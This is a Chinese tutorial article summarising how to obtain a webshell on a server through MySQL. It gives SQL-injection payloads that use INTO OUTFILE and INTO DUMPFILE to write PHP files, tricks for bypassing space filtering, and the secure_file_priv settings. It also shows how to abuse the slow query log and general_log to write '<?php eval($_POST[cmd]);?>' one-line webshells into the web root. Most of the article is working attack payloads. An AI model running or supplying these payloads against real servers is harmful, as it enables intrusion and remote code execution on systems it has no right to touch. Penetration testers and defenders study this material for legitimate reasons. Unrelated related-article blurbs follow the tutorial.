mysql数据库中getshell的方式总结
outfile和dumpfile写shell
利用条件
- 数据库当前用户为root权限;
- 知道当前网站的绝对路径;
PHP的GPC为 off状态;(魔术引号,GET,POST,Cookie)- 写入的那个路径存在写入权限。
基于union联合查询:
?id=1 union select 1,'<?php phpinfo();?>',3 into outfile 'C:\phpstudy\www\shell.php'%23 ?id=1 union select 1,'<?php phpinfo();?>',3 into dumpfile 'C:\phpstudy\www\shell.php'%23
非联合查询
当我们无法使用联合查询时,我们可以使用fields terminated by与lines terminated by来写shell
?id=1 into outfile 'C:\phpstudy\www\shell.php' FIELDS TERMINATED BY '<?php phpinfo();?>'%23
代替空格的方法
+号,%0a、%0b、%a0 、 /**/ 注释符等
outfile和dumpfile的区别
outfile:
1、 支持多行数据同时导出
2、 使用union联合查询时,要保证两侧查询的列数相同
3、 会在换行符制表符后面追加反斜杠
4、会在末尾追加换行
dumpfile:
1、 每次只能导出一行数据
2、 不会在换行符制表符后面追加反斜杠
3、 不会在末尾追加换行
因此,我们可以使用into dumpfile这个函数来顺利写入二进制文件;
当然into outfile函数也可以写入二进制文件,但是无法生效(追加的反斜杠会使二进制文件无法生效)
当我们使用dumpfile,应该手动添加 limit 限制,来获取不同的行数
secure_file_prive
MySQL的secure-file-prive参数是用来限制LOAD DATA, SELECT ,OUTFILE, and LOAD_FILE()传到哪个指定目录的。
secure_file_prive= ,结果为空的话,表示允许任何文件读写
secure_file_prive=NULL,表示不允许任何文件读写
secure_file_prive=‘某个路径’,表示这个路径作为文件读写的路径
在mysql5.5版本前,都是默认为空,允许读取
在mysql5.6版本后 ,默认为NULL,并且无法用
SQL语句对其进行修改。所以这种只能在配置进行修改。
查询secure_file_prive的参数
show global variables like "%secure%"
利用sql语句修改参数
set global secure_file_prive=
但是5.6后不能利用sql修改了,所以只能利用配置修改
修改value的值:
windows下修改配置文件:mysql.ini
linux修改配置文件:my.cnf
日志getshell
慢日志getshell
慢日志:
一般都是通过long_query_time选项来设置这个时间值,时间以秒为单位,可以精确到微秒。如果查询时间超过了这个时间值(默认为10秒),这个查询语句将被记录到慢查询日志中。查看服务器默认时间值方式如下:
show global variables like '%long_query_time%' show global variables like '%long%'
查看慢日志参数
show global variables like '%slow%'
对慢日志参数进行修改
set global slow_query_log=1 #打开慢日志 set global slow_query_log_file='c:\\phpstudy\\www\\test.php'#慢日志的路径 注意:一定要用双反斜杠 SELECT '<?php @eval($_POST[1]);?>' or sleep(11) 这儿11是超过慢日志的10秒时间
利用general_log
利用general_log,可以将所有到达mysql服务器的sql语句,都记录下来。
相关参数一共有3个:general_log、log_output、general_log_file
show variables like 'general_log'; -- 查看日志是否开启 set global general_log=on; -- 开启日志功能 show variables like 'general_log_file'; -- 看看日志文件保存位置 set global general_log_file='tmp/general.lg'; -- 设置日志文件保存位置 show variables like 'log_output'; -- 看看日志输出类型 table或file set global log_output='table'; -- 设置输出类型为 table set global log_output='file'; -- 设置输出类型为file
一般log_output都是file,就是将日志存入文件中。table的话就是将日志存入数据库的日志表中。
getshell
set global general_log=on set global general_log_file='需要攻击的路径' select '<?php eval($_POST[cmd]);?>'
这样就将一句话木马记录到general_log中,从而getshell
binlog的介绍
总结
到此这篇关于mysql数据库中getshell方式的文章就介绍到这了,更多相关mysql getshell的方式内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!
相关文章
这篇文章主要介绍了mysql中根据已有的表来创建新表的三种方式,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下2023-07-07
解决SQLyog连接MySQL出现错误Plugin caching_sha2_password co
当使用SQLyog连接MySQL时,如果遇到插件caching_sha2_password无法加载的错误,可以通过更改密码并将其标识为mysql_native_password来解决,具体步骤包括:打开命令提示符窗口,登录MySQL,修改密码并更换插件,然后使用新密码连接SQLyog2025-01-01
mysql解决远程不能访问的二种方法,需要的朋友可以参考一下2013-04-04
在日常运维工作中,对于mysql数据库的备份是至关重要的,这篇文章主要介绍了MySQL中误删数据恢复的3种极限操作,文中的示例代码讲解详细,感兴趣的小伙伴可以了解下2026-01-01
MySQL Left JOIN时指定NULL列返回特定值详解
我们有时会有这样的应用,需要在sql的left join时,需要使值为NULL的列不返回NULL而时某个特定的值,比如0。这个时候,用is_null(field,0)是行不通的,会报错的,可以用ifnull实现,但是COALESE似乎更符合标准2013-07-07
这篇文章主要来和大家探讨一下Mysql中如何实现两列的值互换,文中为大家提供了一些常用的方法,希望对大家有一定的帮助2024-11-11
mysql取得datetime类型的数据,后面会跟个.0的实现方法
下面小编就为大家带来一篇mysql取得datetime类型的数据,后面会跟个.0的实现方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧2017-03-03
MySQL是中小型网站普遍使用的数据库之一,然而,很多人并不清楚MySQL到底能支持多大的数据量,再加上某些国内CMS厂商把数据承载量的责任推给它,导致很多不了解MySQL的站长对它产生了很多误解2008-12-12
慢查询日志(Slow Query Log) 是 MySQL 内置的一种日志功能,用于记录执行时间超过指定阈值的 SQL 语句,下面小编就和大家简单聊聊慢查询日志的相关配置和应用吧2026-01-01
MySQL5.6引入了LIMIT QueryOptimization特性,可能会导致分页数据重复,下面就来详细的介绍一下MySQL limit 翻页数据重复的问题解决,具有一定的参考价值,感兴趣的可以了解一下2026-03-03
最新评论